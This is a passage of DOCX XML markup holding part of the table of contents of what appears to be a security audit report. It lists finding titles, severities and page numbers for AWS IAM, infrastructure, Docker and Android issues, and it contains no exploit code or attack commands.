              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Detection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Info)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
            <w:spacing w:line="297" w:lineRule="auto"/>
            <w:ind w:right="363"/>
          </w:pPr>
          <w:r>
            <w:rPr/>
            <w:t>BFY-01-020</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-7"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>WP4/5:</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-7"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Possible</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-7"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>IAM</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-7"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Admin</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-7"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>takeover</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-7"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>via</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-7"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Excessive</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-7"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Privileges</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-7"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>(High)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="14"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>84 BFY-01-021</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-11"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>WP3:</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-9"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Possible</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-9"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>DDoS</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-8"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>via</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-9"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>XMLRPC</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-9"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>PingBack</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-9"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>attacks</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-8"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-2"/>
            </w:rPr>
            <w:t>(Low)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-5"/>
            </w:rPr>
            <w:t>86</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
            <w:spacing w:line="252" w:lineRule="exact" w:before="0" w:after="20"/>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250025">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-022</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-16"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP4/5:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Weaknesses</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Vulnerability</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Medium)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
            <w:spacing w:line="297" w:lineRule="auto" w:before="794"/>
            <w:ind w:right="363"/>
          </w:pPr>
          <w:r>
            <w:rPr/>
            <w:t>BFY-01-023 WP4/5: Possible takeover via Active IAM Root Account Use (High)</w:t>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <w:t>90 </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>BFY-01-024</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-8"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>WP4/5:</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-8"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Missing</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-8"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>MFA</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-7"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>for</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-8"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>All</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-8"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>IAM</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-7"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Users</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-8"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>&amp;</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-8"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Root</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-7"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-2"/>
            </w:rPr>
            <w:t>(High)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-5"/>
            </w:rPr>
            <w:t>92</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
            <w:spacing w:line="252" w:lineRule="exact" w:before="0"/>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250024">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-025</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP4/5:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Possible</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>API</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Insecure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Config</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(High)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>95</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250023">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-027</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP4/5:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Missing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>IAM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Key</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Rotation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Medium)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>96</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250022">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-028</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP4/5:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Insufficient</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Infrastructure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Logging</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Monitoring</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(High)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>97</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250021">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-029</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP4/5:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Weaknesses</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>ECR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Vulnerability</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Scanning</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Medium)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250020">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-030</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP4/5:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>ELB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Hardening</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Low)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>103</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250019">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-031</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1/2:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>PII</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Token</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>inadequate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>KeyStore</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Usage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Info)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>104</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250018">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-034</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Android</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Config</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Hardening</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Info)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>108</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9003" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250017">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-038</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP4:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Services</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Docker</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Image</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Leaks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(High)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>110</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9003" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250016">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-039</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP4:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Possible</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Spoofing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>ECS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Task</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Permissions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Low)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>112</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
